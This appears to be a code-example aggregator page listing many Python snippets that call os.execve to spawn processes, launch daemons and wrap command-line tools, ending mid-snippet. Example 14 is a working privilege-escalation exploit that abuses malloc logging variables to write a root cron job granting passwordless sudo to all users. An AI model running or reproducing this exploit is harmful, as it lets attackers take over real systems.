Ejemplo n.º 1
0
def runProg(prog, argv=[ ]):
    args = [ prog ] + argv

    (rfd, wfd) = os.pipe()
    pid = os.fork()
    if pid == 0:
        try:
            fd = os.open("/dev/null", os.O_RDONLY)
            if fd != 0:
                os.dup2(fd, 0)
                os.close(fd)
            if wfd != 1:
                os.dup2(wfd, 1)
                os.close(wfd)
            os.dup2(1, 2)
            e = { "LANG": "C" }
            os.execve(args[0], args, e)
        finally:
            os._exit(255)
    os.close(wfd)

    cret = b''
    cout = os.read(rfd, 8192)
    while cout:
        cret += cout
        cout = os.read(rfd, 8192)
    os.close(rfd)
    (cpid, status) = os.waitpid(pid, 0)

    cret = cret.rstrip().decode('utf-8', 'replace')
    return (status, cret)
Ejemplo n.º 2
0
 def run_cqlsh(self, cmds=None, show_output=False, cqlsh_options=[]):
     cdir = self.get_cassandra_dir()
     cli = os.path.join(cdir, 'bin', 'cqlsh')
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces['thrift'][0]
     port = self.network_interfaces['thrift'][1]
     args = cqlsh_options + [ host, str(port) ]
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, [ 'cqlsh' ] + args, env)
     else:
         p = subprocess.Popen([ cli ] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
         for cmd in cmds.split(';'):
             p.stdin.write(cmd + ';\n')
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print "(EE) " + err,
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print log,
                 i = i + 1
Ejemplo n.º 3
0
def run_sim():
    print "Trump's money simulator (that makes america great again) simulates two different sized states transfering money around, with the awesome Trump algorithm."
    print "The simulator takes in 2 inputs. Due to the awesomeness of the simulator, we can only limit the input to less than a thousand each..."

    input1 = raw_input("[Smaller] State 1 Size:")
    input2 = raw_input("[Larger] State 2 Size:")
    if len(input1) > 3 or len(input2) >3:
        print "Number has to be less than 1000"
        return

    str_to_hash = "[]{0}[]{1}##END".format(input1,input2)
    sim_id = hashlib.sha256(str_to_hash).hexdigest()
    sim_name = "sims/sim-{0}".format(sim_id)

    if os.path.isfile(sim_name):
        print "Sim compiled, running sim..."
    else:
        print "Compiling Sim"
        ret = subprocess.call(["clang", "-m32", "-DL1={}".format(input1),
                        "-DL2={}".format(input2), "pound.c", "-o",
                        sim_name])
        if ret != 0:
            print "Compiler error!"
            return

    os.execve("/usr/bin/sudo", ["/usr/bin/sudo", "-u", "smalluser", sim_name], {})
Ejemplo n.º 4
0
	def __init__ (self, executable, args, env, logfile=None):
		import tempfile
		import os
		self.logfile = logfile
		self.executable = find_executable(executable, env.has_key("PATH") and env["PATH"])
		self.args = args
		self.exitstatus = None
		self.running = 0
		self.pid = os.fork()
		if self.pid == 0:	# child process
			tempfile.template = None
			if logfile:
				fd = os.open(logfile.filename, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0664)
				os.close(1)
				os.dup2(fd, 1)
				os.close(2)
				os.dup2(fd, 2)
			for key in env.keys():
				os.environ[key] = env[key]
			sys.stderr.write("executable is " + str(self.executable) + ", args are " + str(args) + ", env = " + str(os.environ) + "\n");
			sys.exitfunc = None
			os.execve(self.executable, (self.executable,) + args, os.environ)
		else:
			self.running = 1
			add_exit_function(lambda x=self.pid: killproc(x))
Ejemplo n.º 5
0
def run_child(executable, output_writer, input_reader=None, args=None, env=None):
    """
    Run a child process, hooking its stdout and stderr to output FD

    Returns the child PID or throws an exception.
    """
    if not input:
        input_reader = open("/dev/null", "r")


    # convert the file object to a real FD
    output_fileno = int(output_writer.get_logfile_fd())

    # Carry on
    pid = os.fork()
    if not pid:
        try:
            if input_reader:
                os.dup2(input_reader, 0)
            os.dup2(output_fileno, 1)
            os.dup2(output_fileno, 2)
            os.execve(executable, args, env)
        except:
            os._exit(1)

    return pid
Ejemplo n.º 6
0
 def run_cli(self, cmds=None, show_output=False, cli_options=[]):
     cdir = self.get_cassandra_dir()
     cli = common.join_bin(cdir, 'bin', 'cassandra-cli')
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces['thrift'][0]
     port = self.network_interfaces['thrift'][1]
     args = [ '-h', host, '-p', str(port) , '--jmxport', str(self.jmx_port) ] + cli_options
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, [ common.platform_binary('cassandra-cli') ] + args, env)
     else:
         p = subprocess.Popen([ cli ] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
         for cmd in cmds.split(';'):
             p.stdin.write(cmd + ';\n')
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print_("(EE) ", err, end='')
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print_(log, end='')
                 i = i + 1
Ejemplo n.º 7
0
Archivo: node.py Proyecto: thepaul/ccm
 def run_cli(self, cmds=None, show_output=False, cli_options=[]):
     cdir = self.get_cassandra_dir()
     cli = os.path.join(cdir, "bin", "cassandra-cli")
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces["thrift"][0]
     port = self.network_interfaces["thrift"][1]
     args = ["-h", host, "-p", str(port), "--jmxport", str(self.jmx_port)] + cli_options
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, ["cassandra-cli"] + args, env)
     else:
         p = subprocess.Popen(
             [cli] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE
         )
         for cmd in cmds.split(";"):
             p.stdin.write(cmd + ";\n")
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print "(EE) " + err,
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print log,
                 i = i + 1
Ejemplo n.º 8
0
def spawn_getpid_and_redirect(wait_op, file, args, ioredir):
  """ This forks a subprocess and redirects its output.
      There appears to be no nice way (even in popen3) for doing this.

  Args:
      wait_op: If wait_op is os.P_WAIT, then exit status is returned.
               Otherwise pid is returned.
      file: file name of process to spawn. Just as in os.execve
      args: Command line of process. Just as in os.execve
      ioredir: a list of tuples: [(file_to_redirect, fd_to_redirect), ...]
               The fd of stdin is 0, stdout is 1, and stderr is 2.
      Eg.
      pid = spawnvio(os.P_NOWAIT, '%s/loop_AdminConsole.py' % self.scripts_dir,
                     ['loop_AdminConsole.py'], [(outf, 1), (outf, 2)])
  """

  pid = os.fork()
  if pid:
    # I am the parent
    if wait_op == os.P_WAIT:
      p, s = os.waitpid(pid, 0)
      return s
    else:
      return pid
  else:
    # I am the child
    try:
      # Perform redirections
      for n, u in ioredir:
        if n != u:
          os.dup2(n, u)
      os.execve(file, args, os.environ)
    finally:
      os._exit(1)
Ejemplo n.º 9
0
def run(projects, binary, bin_args, env=None, exec_=True):
    """ Find binary in worktree and
        exec it with given arguments.
    """
    paths = list()
    for proj in projects:
        paths += [proj.sdk_directory]
    if os.path.exists(binary):
        bin_path = qisys.sh.to_native_path(binary)
    else:
        bin_path = None
        candidates = qibuild.find.find_bin(paths, binary, expect_one=False)
        if len(candidates) == 1:
            bin_path = candidates[0]
        if len(candidates) > 1:
            bin_path = qisys.interact.ask_choice(candidates,
                                                 "Please select a binary to run")
    if not bin_path:
        bin_path = qisys.command.find_program(binary)
    if not bin_path:
        raise Exception("Cannot find " + binary + " binary")
    cmd = [bin_path] + bin_args
    if exec_:
      ui.debug("exec", cmd)
      os.execve(bin_path,  cmd, env)
    else:
      qisys.command.call(cmd, env=env)
Ejemplo n.º 10
0
    def spawn_children(self, number=1):
        parent_pid = os.getpid()
        self.log.debug('Controller.spawn_children(number=%d)' % number)

        for i in range(number):
            child_side, parent_side = os.pipe()
            try:
                child_pid = os.fork()
            except:
                print_exc('Could not fork child! Panic!')
                ### TODO: restart

            if not child_pid:
                os.close(parent_side)
                command = [sys.executable, '-c',
                    'import sys; from spawning import spawning_child; spawning_child.main()',
                    str(parent_pid),
                    str(self.sock.fileno()),
                    str(child_side),
                    self.factory,
                    json.dumps(self.args)]
                if self.args['reload'] == 'dev':
                    command.append('--reload')
                env = environ()
                env['EVENTLET_THREADPOOL_SIZE'] = str(self.config.get('threadpool_workers', 0))
                os.execve(sys.executable, command, env)
            os.close(child_side)
            self.child_pipes[child_pid] = parent_side
Ejemplo n.º 11
0
  def run_daemon(path, args, detach=True, environ=None):
    """Run a program as a long-running background process.

    Args:
      path [string]: Path to the program to run.
      args [list of string]: Arguments to pass to program
      detach [bool]: True if we're running it in separate process group.
         A separate process group will continue after we exit.
    """
    pid = os.fork()
    if pid == 0:
      if detach:
        os.setsid()
    else:
      return pid

    # Iterate through and close all file descriptors
    # (other than stdin/out/err).
    maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
    if (maxfd == resource.RLIM_INFINITY):
       maxfd = 1024
    for fd in range(3, maxfd):
       try:
         os.close(fd)
       except OSError:
         pass

    os.execve(path, args, environ or os.environ)
Ejemplo n.º 12
0
  def _InstallRpm(self, path):
    """Client update for rpm based distros.

    Upgrading rpms is a bit more tricky than upgrading deb packages since there
    is a preinstall script that kills the running GRR daemon and, thus, also
    the installer process. We need to make sure we detach the child process
    properly and therefore cannot use client_utils_common.Execute().

    Args:
      path: Path to the .rpm.
    """

    pid = os.fork()
    if pid == 0:
      # This is the child that will become the installer process.

      cmd = "/bin/rpm"
      cmd_args = [cmd, "-U", "--replacepkgs", "--replacefiles", path]

      # We need to clean the environment or rpm will fail - similar to the
      # use_client_context=False parameter.
      env = os.environ.copy()
      env.pop("LD_LIBRARY_PATH", None)
      env.pop("PYTHON_PATH", None)

      # This call doesn't return.
      os.execve(cmd, cmd_args, env)

    else:
      # The installer will run in the background and kill the main process
      # so we just wait. If something goes wrong, the nanny will restart the
      # service after a short while and the client will come back to life.
      time.sleep(1000)
Ejemplo n.º 13
0
def handoff_all():
	main_logger.info("Preparing to re-exec with handoffs")

	handoff_data = {}
	for name, manager in clients.items():
		data = manager.handoff()
		if data:
			handoff_data[name] = data

	main_logger.info("Final handoff data: {!r}".format(handoff_data))

	for manager in clients.values():
		manager.get()

	main_logger.info("All managers stopped")

	# TODO this will fail if the bytes contain invalid utf-8
	handoff_data_str = json.dumps(handoff_data)
	env = os.environ.copy()
	env['handoff_data'] = handoff_data_str
	main_logger.info("Calling execve({!r}, {!r}, {!r})".format(sys.executable, sys.argv, env))

	# critical section - absolutely no blocking calls beyond this point
	gc.disable() # we don't want any destructors running
	open_fds = set(map(int, os.listdir('/proc/self/fd')))
	for fd in open_fds - {0, 1, 2} - set(data['fd'] for data in handoff_data.values()):
		try:
			os.close(fd)
		except OSError:
			pass # this is probably EBADF, but even if it isn't we can't do anything about it
	os.execve(sys.executable, [sys.executable, '-m', 'ekimbot'] + sys.argv[1:], env)
Ejemplo n.º 14
0
def run():
    """runs exploit"""
    size = os.stat("/etc/sudoers").st_size

    env = dict()
    env['MallocLogFile'] = '/etc/crontab'
    env['MallocStackLogging'] = 'yes'
    env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'

    print("Trying /etc/crontab...")

    pid = os.fork()
    if pid == 0:
        os.close(1)
        os.close(2)
        os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)

    time.sleep(1)

    try:
        crontab = open("/etc/crontab").read()
        if "NOPASSWD" not in crontab:
            return
    except IOError:
        return

    print("Done \nWaiting for /etc/sudoers to change (<60 seconds)...")

    while os.stat("/etc/sudoers").st_size == size:
        print(".")
        time.sleep(1)

    return True
Ejemplo n.º 15
0
    def __init__(self, cwd=None, env=None):
        BaseProxy.__init__(self, set())
        if env is None:
            env = os.environ.copy()
        self._servers = [ None ] * 5
        p0, p1 = os.pipe(), os.pipe()

        self._pid = os.fork()
        if self._pid == 0:
            os.close(p1[1])
            os.close(p0[0])
            if not cwd:
                if 'conary_test.serverCacheProxy' in sys.modules:
                    fpath = sys.modules['conary_test.serverCacheProxy'].__file__
                else:
                    fpath = sys.argv[0]
                cwd = os.path.dirname(fpath)
            cmd = ["/usr/bin/python", "-c",
                "from conary_test import serverCacheProxy; "
                "serverCacheProxy.Child(%d, %d)" %
                    (p1[0], p0[1])]
            os.chdir(cwd)
            os.execve(cmd[0], cmd, env)
            os._exit(0)

        try:
            os.close(p0[1])
            os.close(p1[0])
            self._pipe = Pipe(p0[0], p1[1])
            sdict = loadData(self._pipe)
            self._methods = sdict['methods']
            #print "Child started", methodname, params
        except:
            os.waitpid(self._pid, 0)
            raise
Ejemplo n.º 16
0
def execute(path, rfile, wfile, args=[], env={}):
    if not hasattr(os, 'fork'):
        return 1

    # Values must be string
    for k, v in env.iteritems(): env[k] = str(v)

    nobody = nobody_uid()
    wfile.flush() # Always flush before forking
    pid = os.fork()
    if pid != 0:
        # Parent
        pid, sts = os.waitpid(pid, 0)
        # throw away additional data [see bug #427345]
        while select.select([rfile], [], [], 0)[0]:
            if not rfile.read(1):
                break
        return sts

    # Child
    try:
        try:
            os.setuid(nobody)
        except os.error:
            pass
        fdnull = open(os.devnull, 'a+')
        os.dup2(rfile.fileno(), 0)
        os.dup2(wfile.fileno(), 1)
        if not __debug__:
            os.dup2(fdnull.fileno(), 2)
        os.execve(path, [os.path.basename(path)] + args, env)
    except:
        os._exit(127)
def main(binary, dirnames, filename):
    script_name = os.path.basename(filename)
    if script_name == 'node':
        script = [binary]
    else:
        script = None
        for dirname in dirnames:
            filename = os.path.join(dirname, script_name)
            if os.path.isfile(filename):
                script = [binary, filename]
                break
        if script is None:
            all_scripts = []
            for p in dirnames:
                all_scripts.extend(os.listdir(p))
            all_scripts = [repr(s) for s in all_scripts]
            all_scripts = ', '.join(sorted(all_scripts))
            print((
                'Error: Script(s) {0} not found in {1[0]};{1[1]}.\n'
                'You may have a typo in your buildout config.\n'
                'Available scripts are: {2}'
            ).format(repr(script_name), dirnames, all_scripts))
            sys.exit(1)
    args = script + sys.argv[1:]
    os.execve(args[0], args, os.environ)
Ejemplo n.º 18
0
def execScript(stype, test, dir_test, pipeout):
    env = {}
    cmd_script = dir_test + stype
    outPath = dir_test + "/output/"
    args = [cmd_script]

    os.chdir(dir_test)

    env["RTH"] = mypath
    env["RTH_OUT"] = outPath
    env["RTH_TESTDIR"] = dir_test
    env["RTH_CLEANUP"] = str(cleanup)
    env["RTH_NODE_COUNT"] = str(pbs_node_count)
    env["RTH_NODE_PPN"] = str(pbs_node_ppn)
    env["RTH_SUBMIT_CMD"] = submit_cmd
    env["RTH_SUBMIT_ARGS"] = submit_args
    env["RTH_MAX_QUEUE_TIME"] = str(max_queue_time)
    env["RTH_MAX_RUN_TIME"] = str(max_run_time)
    if use_msub == 1:
        env["RTH_USE_MSUB"] = "1"
    setEnv(env, "PATH")
    setEnv(env, "HOME")
    setEnv(env, "SHELL")
    setEnv(env, "LANG")
    setEnv(env, "PWD")
    setEnv(env, "USER")
    setEnv(env, "TERM")
    setEnv(env, "DISPLAY")
    setEnv(env, "LOGNAME")
    setEnv(env, "MOABHOMEDIR")

    os.execve(cmd_script, args, env)
Ejemplo n.º 19
0
def develop():
    ensure_project_bootstrapped()
    tmuxp = get_virtualenv_binary_path('tmuxp')
    tmux_config_filename = os.path.abspath('.cob/_frontend.yml')
    with open(tmux_config_filename, 'w') as f:
        yaml.dump(_get_tmux_config(), f)
    os.execve(tmuxp, [tmuxp, 'load', tmux_config_filename], {**os.environ})
Ejemplo n.º 20
0
def execve(space, w_command, w_args, w_env):
    """ execve(path, args, env)

Execute a path with arguments and environment, replacing current process.

        path: path of executable file
        args: iterable of arguments
        env: dictionary of strings mapping to strings
    """
    command = fsencode_w(space, w_command)
    try:
        args_w = space.unpackiterable(w_args)
        if len(args_w) < 1:
            raise oefmt(space.w_ValueError,
                        "execv() must have at least one argument")
        args = [fsencode_w(space, w_arg) for w_arg in args_w]
    except OperationError as e:
        if not e.match(space, space.w_TypeError):
            raise
        raise oefmt(space.w_TypeError,
                    "execv() arg 2 must be an iterable of strings")
    #
    if w_env is None:    # when called via execv() above
        try:
            os.execv(command, args)
        except OSError as e:
            raise wrap_oserror(space, e)
    else:
        env = _env2interp(space, w_env)
        try:
            os.execve(command, args, env)
        except OSError as e:
            raise wrap_oserror(space, e)
Ejemplo n.º 21
0
def startJoe(joeexe, args=None):
    """Starts JOE in a pty, returns a handle to controller"""
    if not joeexe.startswith('/'):
        joeexepath = os.path.join(os.getcwd(), joeexe)
    else:
        joeexepath = joeexe
    
    if args is None:
        args = StartupArgs()
    
    env = {}
    #env.update(os.environ)
    
    env['HOME'] = tmpfiles.homedir
    env['LINES'] = str(args.lines)
    env['COLUMNS'] = str(args.columns)
    env['TERM'] = 'ansi'
    env['LANG'] = 'en_US.UTF-8'
    env['SHELL'] = os.getenv('SHELL', '/bin/sh')
    
    env.update(args.env)
    
    cmdline = ('joe',) + args.args
    
    pid, fd = pty.fork()
    if pid == 0:
        os.chdir(tmpfiles.workdir)
        os.execve(joeexepath, cmdline, env)
        os._exit(1)
    else:
        buf = array.array('h', [args.lines, args.columns, 0, 0])
        fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)
        return JoeController(joeexepath, cmdline, env, args, pid, fd)
Ejemplo n.º 22
0
def capture(when):
  """
  Get a tcpdump starting just before time when through to
  when+logtime+postime.   It should be called at time when-pretime.
  The dumpfile is named per time when (the nominal start time).

  """
  global running, running_tc
  nodup=0
  # get a new logfile
  while True:
    fname=time.strftime("%Y/%m/%d/%%s%Y%m%dT%TZ_ALL%%d.tra", time.gmtime(when))%(server, nodup)
    if not os.path.exists(fname):
      break
    nodup=nodup+1

  pid = os.fork()
  if pid:
    # parent schedules the kill timer
    running_tc.acquire()
    running.append((pid, when+logtime+posttime))
    running_tc.notifyAll()
    running_tc.release()
  else:
    # Child launches tcpdump
    mkdirs(fname)
    args = [ "/usr/sbin/tcpdump", "-i", "eth0", "-p", "-w", fname, "port", "8000"]
    print "Pid %d Writing: %s"%(os.getpid(), fname)
    os.execve(args[0], args, os.environ)
Ejemplo n.º 23
0
        def pip(self):
            ctx = Context()
            for recipe in Recipe.list_recipes():
                key = "{}.build_all".format(recipe)
                if key not in ctx.state:
                    continue
                recipe = Recipe.get_recipe(recipe, ctx)
                recipe.init_with_ctx(ctx)
            print(ctx.site_packages_dir)
            if not hasattr(ctx, "site_packages_dir"):
                print("ERROR: python must be compiled before using pip")
                sys.exit(1)

            pip_env = {
                "CC": "/bin/false",
                "CXX": "/bin/false",
                "PYTHONPATH": ctx.site_packages_dir,
                "PYTHONOPTIMIZE": "2",
                "PIP_INSTALL_TARGET": ctx.site_packages_dir
            }
            print(pip_env)
            pip_path = sh.which("pip")
            args = [pip_path] + sys.argv[2:]
            if not pip_path:
                print("ERROR: pip not found")
                sys.exit(1)
            import os
            print("-- execute pip with: {}".format(args)) 
            os.execve(pip_path, args, pip_env)
Ejemplo n.º 24
0
Archivo: node.py Proyecto: jsanda/ccm
 def run_cqlsh(self, cmds=None, show_output=False, cqlsh_options=[]):
     cdir = self.get_cassandra_dir()
     cli = common.join_bin(cdir, "bin", "cqlsh")
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces["thrift"][0]
     if self.cluster.version() >= "2.1":
         port = self.network_interfaces["binary"][1]
     else:
         port = self.network_interfaces["thrift"][1]
     args = cqlsh_options + [host, str(port)]
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, [common.platform_binary("cqlsh")] + args, env)
     else:
         p = subprocess.Popen(
             [cli] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE
         )
         for cmd in cmds.split(";"):
             p.stdin.write(cmd + ";\n")
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print_("(EE) ", err, end="")
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print_(log, end="")
                 i = i + 1
Ejemplo n.º 25
0
	def execute_selections(self, sels, args):
		injector_cache_dir = basedirs.save_path(self.config.cache, join('0install.net', 'injector'))
		ensure_runenv(injector_cache_dir)

		impls = {elem.attrs["interface"]: (elem, self._get_path(elem)) for elem in ZI.children(sels, "selection")}

		bs = bindings.collect_bindings(impls, sels)

		env = os.environ.copy()

		# Environment bindings...
		for (iface, b) in bs:
			if isinstance(b, bindings.EnvironmentBinding):
				(sel, impl_path) = impls[iface]
				val = b.get_value(impl_path, env.get(b.name, None))
				if val is not None:
					#print("{}={}".format(b.name, val))
					env[b.name] = val

		# Executable bindings...
		for (iface, b) in bs:
			if isinstance(b, bindings.ExecutableBinding):
				b.do_exec_binding(self.config, env, impls, iface)

		argv = command.build_command(impls, sels.attrs['interface'], sels.attrs['command'], env) + args
		os.execve(argv[0], argv, env)
Ejemplo n.º 26
0
def exec_daemon(
    instance: EdenInstance,
    daemon_binary: Optional[str] = None,
    edenfs_args: Optional[List[str]] = None,
    takeover: bool = False,
    gdb: bool = False,
    gdb_args: Optional[List[str]] = None,
    strace_file: Optional[str] = None,
    foreground: bool = False,
) -> NoReturn:
    """Execute the edenfs daemon.

    This method uses os.exec() to replace the current process with the edenfs daemon.
    It does not return on success.  It may throw an exception on error.
    """
    try:
        cmd, env = _get_daemon_args(
            instance=instance,
            daemon_binary=daemon_binary,
            edenfs_args=edenfs_args,
            takeover=takeover,
            gdb=gdb,
            gdb_args=gdb_args,
            strace_file=strace_file,
            foreground=foreground,
        )
    except DaemonBinaryNotFound as e:
        print_stderr(f"error: {e}")
        os._exit(1)

    os.execve(cmd[0], cmd, env)
    # Throw an exception just to let mypy know that we should never reach here
    # and will never return normally.
    raise Exception("execve should never return")
Ejemplo n.º 27
0
 def do_garbage_collect(self):
     """
     Do Resource Release exercise at low memory threshold, blow up over max
     """
     error_str = ''
     try:
         rss_mem_usage = (float(self.proc_monitor.get_memory_info().rss)
                                 /1024/1024)
     except Exception as exc:
         error_str = str(exc)
     # Process above error...
     if (error_str):
         log_error("Error obtaining resource usage - %s" % error_str) 
         sys.exit(os.EX_SOFTWARE)
     memory_exec_threshold = get_numeric_setting('memory_exec_threshold', float)
     if (rss_mem_usage > memory_exec_threshold):
         log_warning('Memory exec threshold %s MB reached, actual %s MB - execve() to reclaim.'
                     % (memory_exec_threshold, rss_mem_usage))
         file_path = os.path.join(sys.path[0], sys.argv[0])
         file_path = os.path.normpath(file_path)
         os.execve(file_path, sys.argv, os.environ)
     else:
         # Spend idle time being RAM thrifty...
         gc.collect()
         return
Ejemplo n.º 28
0
def run_command(cmd, args, fd_map, env):  # run command by replacing the current process
	def _safe_close(file_descriptor):
		try:
			os.close(file_descriptor)
		except Exception:
			pass

	for fd_target, fd_source in fd_map.items():
		os.dup2(fd_source, fd_target)  # set stdin/stdout/stderr
	try:
		fd_max = os.sysconf('SC_OPEN_MAX')
	except Exception:
		fd_max = 256
	for fd_open in irange(3, fd_max):  # close inherited file descriptors except for std{in/out/err}
		_safe_close(fd_open)
	try:
		os.execve(cmd, args, env)  # replace process - this command DOES NOT RETURN if successful!
	except Exception:
		pass
	error_msg_list = [
		'== grid-control process error ==',
		'        pid: %s' % os.getpid(),
		'     fd map: %s' % repr(fd_map),
		'environment: %s' % repr(env),
		'    command: %s' % repr(cmd),
		'  arguments: %s' % repr(args),
		'  exception: %s' % repr(sys.exc_info()[1]),
	]
	sys.stderr.write(str.join('\n', error_msg_list))
	for fd_std in [0, 1, 2]:
		_safe_close(fd_std)
	exit_without_cleanup(os.EX_OSERR)  # exit forked process with OS error
Ejemplo n.º 29
0
def run_child(executable, output_writer, input_reader=None, args=[], env={}):
    """
    Run a child process, hooking its stdout and stderr to output FD

    Returns the child PID or throws an exception.
    """
    if not input:
        input_reader = open("/dev/null", "r")

    # convert the file object to a real FD
    output_fileno = int(output_writer.get_logfile_fd())

    # Carry on
    pid = os.fork()
    if not pid:
        try:
            if input_reader:
                os.dup2(input_reader, 0)
            os.dup2(output_fileno, 1)
            os.dup2(output_fileno, 2)
            os.execve(executable, args, env)
        except:
            tb = traceback.format_exception(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])
            output_writer.log_err("Error invoking os.execve")
            output_writer.log_err(tb)
            os._exit(1)

    return pid
Ejemplo n.º 30
0
    def start_daemon(self):
        pidfile = self.conf_dir + "/pid"
        if os.path.exists(pidfile) and os.path.isfile(pidfile):
            try:
                pf = open(pidfile, "a+")
                fcntl.flock(pf.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
                fcntl.flock(pf.fileno(), fcntl.LOCK_UN)
                pf.close()
            except IOError as e:
                if e.errno == errno.EAGAIN:
                    # If we failed to get a lock, then the daemon is running
                    # and we're done.
                    return

        pid = os.fork()
        if not pid:
            # Shutup any log output before canto-daemon sets up it's log
            # (particularly the error that one is already running)

            fd = os.open("/dev/null", os.O_RDWR)
            os.dup2(fd, sys.stderr.fileno())

            os.setpgid(os.getpid(), os.getpid())
            os.execve("/bin/sh",
                     ["/bin/sh", "-c", "canto-daemon -D " + self.conf_dir],
                     os.environ)

            # Should never get here, but just in case.
            sys.exit(-1)

        while not os.path.exists(self.socket_path):
            time.sleep(0.1)

        return pid
Ejemplo n.º 31
0
def bulker_activate(bulker_config,
                    cratelist,
                    echo=False,
                    strict=False,
                    prompt=True):
    """
    Activates a given crate.

    :param yacman.YacAttMap bulker_config: The bulker configuration object.
    :param list cratelist: a list of cratevars objects, which are dicts with
        values for 'namespace', 'crate', and 'tag'.
    :param bool echo: Should we just echo the new PATH to create? Otherwise, the
        function will create a new shell and replace the current process with
        it.
    :param bool strict: Should we wipe out the PATH, such that the returned
        environment contains strictly only commands listed in the bulker
        manifests?
    """
    # activating is as simple as adding a crate folder to the PATH env var.

    new_env = os.environ

    if hasattr(bulker_config.bulker, "shell_path"):
        shellpath = os.path.expandvars(bulker_config.bulker.shell_path)
    else:
        shellpath = os.path.expandvars("$SHELL")

    if not is_command_callable(shellpath):
        bashpath = "/bin/bash"
        _LOGGER.warning(
            "Specified shell is not callable: '{}'. Using {}.".format(
                shellpath, bashpath))
        shell_list = [bashpath, bashpath]

    if hasattr(bulker_config.bulker, "shell_rc"):
        shell_rc = os.path.expandvars(bulker_config.bulker.shell_rc)
    else:
        if os.path.basename(shellpath) == "bash":
            shell_rc = "$HOME/.bashrc"
        elif os.path.basename(shellpath) == "zsh":
            shell_rc = "$HOME/.zshrc"
        else:
            _LOGGER.warning("No shell RC specified shell")

    if os.path.basename(shellpath) == "bash":
        shell_list = [shellpath, shellpath, "--noprofile"]
    elif os.path.basename(shellpath) == "zsh":
        shell_list = [shellpath, shellpath]
    else:
        bashpath = "/bin/bash"
        _LOGGER.warning(
            "Shell must be bash or zsh. Specified shell was: '{}'. Using {}.".
            format(shellpath, bashpath))
        shell_list = [bashpath, bashpath, "--noprofile"]

    newpath = get_new_PATH(bulker_config, cratelist, strict)

    # We can use lots of them. use the last one
    name = "{namespace}/{crate}".format(namespace=cratelist[-1]["namespace"],
                                        crate=cratelist[-1]["crate"])

    _LOGGER.debug("Newpath: {}".format(newpath))

    if hasattr(bulker_config.bulker, "shell_prompt"):
        ps1 = bulker_config.bulker.shell_prompt
    else:
        if os.path.basename(shellpath) == "bash":
            ps1 = "\\u@\\b:\\w\\a\\$ "
            # With color:
            ps1 = "\\[\\033[01;93m\\]\\b|\\[\\033[00m\\]\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$ "
        elif os.path.basename(shellpath) == "zsh":
            ps1 = "%F{226}%b|%f%F{blue}%~%f %# "
        else:
            _LOGGER.warning(
                "No built-in custom prompt for shells other than bash or zsh")

    # \b is our bulker-specific code that we populate with the crate
    # registry path
    ps1 = ps1.replace("\\b", name)  # for bash
    ps1 = ps1.replace("%b", name)  # for zsh
    _LOGGER.debug(ps1)

    if echo:
        print("export BULKERCRATE=\"{}\"".format(name))
        print("export BULKERPATH=\"{}\"".format(newpath))
        print("export BULKERSHELLRC=\"{}\"".format(shell_rc))
        if prompt:
            print("export BULKERPROMPT=\"{}\"".format(ps1))
            print("export PS1=\"{}\"".format(ps1))
        print("export PATH={}".format(newpath))
        return
    else:
        _LOGGER.debug("Shell list: {}".format(shell_list))

        new_env["BULKERCRATE"] = name
        new_env["BULKERPATH"] = newpath
        if prompt:
            new_env["BULKERPROMPT"] = ps1

        new_env["BULKERSHELLRC"] = shell_rc

        if strict:
            for k in bulker_config.bulker.envvars:
                new_env[k] = os.environ.get(k, "")

        if os.path.basename(shellpath) == "bash":
            if strict:
                rcfile = mkabs(bulker_config.bulker.rcfile_strict,
                               os.path.dirname(bulker_config._file_path))
            else:
                rcfile = mkabs(bulker_config.bulker.rcfile,
                               os.path.dirname(bulker_config._file_path))

            shell_list.append("--rcfile")
            shell_list.append(rcfile)
            _LOGGER.debug("rcfile: {}".format(rcfile))
            _LOGGER.debug(shell_list)

        if os.path.basename(shellpath) == "zsh":
            if strict:
                rcfolder = mkabs(
                    os.path.join(
                        os.path.dirname(bulker_config.bulker.rcfile_strict),
                        "zsh_start_strict"),
                    os.path.dirname(bulker_config._file_path))
            else:
                rcfolder = mkabs(
                    os.path.join(
                        os.path.dirname(bulker_config.bulker.rcfile_strict),
                        "zsh_start"),
                    os.path.dirname(bulker_config._file_path))

            new_env["ZDOTDIR"] = rcfolder
            _LOGGER.debug("ZDOTDIR: {}".format(new_env["ZDOTDIR"]))

        _LOGGER.debug(new_env)
        #os.execv(shell_list[0], shell_list[1:])
        os.execve(shell_list[0], shell_list[1:], env=new_env)
Ejemplo n.º 32
0
def js_run(settings, nics, env, command, stdout=None, stderr=None):
    """
    Runs Horovod with jsrun.

    Args:
        settings: Settings for running jsrun.
                  Note: settings.num_proc and settings.hosts must not be None.
